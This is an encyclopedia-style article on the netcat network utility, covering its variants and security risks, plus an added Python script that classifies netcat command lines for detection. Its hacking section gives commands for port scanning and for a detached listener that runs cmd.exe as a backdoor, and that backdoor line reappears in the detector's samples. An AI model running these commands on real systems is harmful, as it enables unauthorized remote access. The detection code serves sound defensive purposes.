Netcat
From Wikipedia, the free encyclopedia
| netcat | |
|---|---|
| Developer: | *Hobbit* |
| Latest release: | 1.10 / March 20, 1996 |
| OS: | UNIX |
| Use: | Network utility |
| License: | BSD License |
| Website: | http://netcat.sourceforge.net/ |
In computing, netcat is a network utility for reading from and writing to network connections on either TCP or UDP. It is designed in a thin and simple way, which makes it easy to incorporate in larger applications. Because of its versatility, netcat is also called the "TCP/IP Swiss Army knife".
Netcat was twice voted the fourth most useful network security tool in polls conducted by insecure.org on the nmap users mailing list[1].
Variants
The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.
Netcat is fully POSIX compatible and several implementations exist, including a rewrite from scratch known as GNU netcat, which is maintained by Giovanni Giacobbi, and an MS-Windows version of netcat created by Chris Wysopal. An encrypted version of netcat named Cryptcat is also available for use when security is a concern. Andreas Bischoff has ported the Windows version to Windows CE (Pocket PC and Handheld PC).
On some systems, modified versions or similar utilities go by the command name(s) nc, ncat, pnetcat, socat, sock, socket, spd.
Security risks
Netcat is sometimes detected and flagged as a security risk by virus scanners and spyware removal software, which may simplistically categorise it as a remote administration tool[1], or treat it as a security cracking tool which may have been planted by malicious software[2]. Such warnings do not take into account its many legitimate uses as a flexible network data transfer tool. Concerns may nevertheless be justified insofar as netcat can serve as a tool for undesirable activity such as port scanning or as a vehicle with which to exploit vulnerabilities, and can be configured to allow unsecured remote access to a system. It is also important to note that unless it was compiled with the "GAPING_SECURITY_HOLE" flag, netcat is harmless to have on your system.
Hacking with netcat
With netcat you can port scan:
nc -v -w 2 -z $targetip $port-range
It can be used to connect to any port, just as telnet can; however, it does not have the EOF problem that telnet does, so it allows your network output to finish. It can also be used to connect to UDP ports. The feature of netcat most likely to be used as a security exploit is its ability to run as both a server and a client. It is rather simple to include netcat in any application you write and then execute:
nc -l -p #port-number
and you have a backdoor in the system.
Netcat can be used to host a file server. By hooking it up with the Vanquish rootkit at rootkit.com, netcat can effectively be hidden on a machine. Netcat working as a backdoor can execute cmd.exe and transfer control to a hacker, who can then transfer the files he wants from the target computer.
nc -L #targetip -p #port-number -v -t -d -e cmd.exe
Here -v is for verbose output, -d runs netcat detached from the console, and -e executes any program. Connect to the target using:
nc -v #targetip #port-number
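The options used in the commands above are also what a defender can key on in process-creation logs, rather than flagging every copy of netcat. The following is an added example, not part of the original article: it parses netcat command lines and sorts them by option. The binary-name list, the category labels and the sample command lines are assumptions constructed for illustration.

```python
import re
import shlex

# Assumption: names to match; a renamed binary needs hash- or behaviour-based detection.
NC_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
TAKES_VALUE = set("egGiopsw")  # options that consume a value, per the nc usage text

def parse_nc(cmdline):
    """Return {option_letter: value or True} for a netcat command line, else None."""
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not tokens or re.split(r"[\\/]", tokens[0])[-1].lower() not in NC_NAMES:
        return None
    opts, rest = {}, iter(tokens[1:])
    for tok in rest:
        if len(tok) < 2 or not tok.startswith("-"):
            continue                      # positional argument: host or port
        for pos, ch in enumerate(tok[1:], start=1):
            if ch in TAKES_VALUE:
                # Value is glued on (-p4444) or is the next token (-p 4444).
                opts[ch] = tok[pos + 1:] or next(rest, "")
                break
            opts[ch] = True               # plain flag, possibly bundled (-lvp)
    return opts

def classify(cmdline):
    """Label a command line by the netcat options that matter for triage."""
    opts = parse_nc(cmdline)
    if opts is None:
        return "not-netcat"
    listening = "l" in opts or "L" in opts
    if "e" in opts:                       # -e: execute a program
        return "exec-listener" if listening else "exec"
    if "z" in opts:                       # -z: used for port scanning
        return "scan"
    return "listener" if listening else "client"

# Constructed process-creation command lines (not from a real system).
SAMPLE = [
    r"C:\Tools\nc.exe -L -p 4444 -v -t -d -e cmd.exe",
    "nc -v -w 2 -z 192.0.2.10 20-25",
    "nc -l -p 9000",
    "nc -v 192.0.2.10 80",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(f"{classify(line):14} {line}")
```

Only the first sample combines a listener with -e; the scan, the plain listener and the plain client are reported separately so they can be handled at a lower priority.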
External links
- nc(1) man page via OpenBSD
- netcat.sourceforge.net GNU netcat
- www.vulnwatch.org/netcat/ Netcat for Windows
- prt.fernuni-hagen.de/~bischoff/wince/Andreas_WINCE_stuff.html#netcat Netcat for Windows CE (PocketPC)
- Using Netcat for backup
- http://www.networknewz.com/networknewz-10-20031020NetCatSecurity.html Hacking with netcat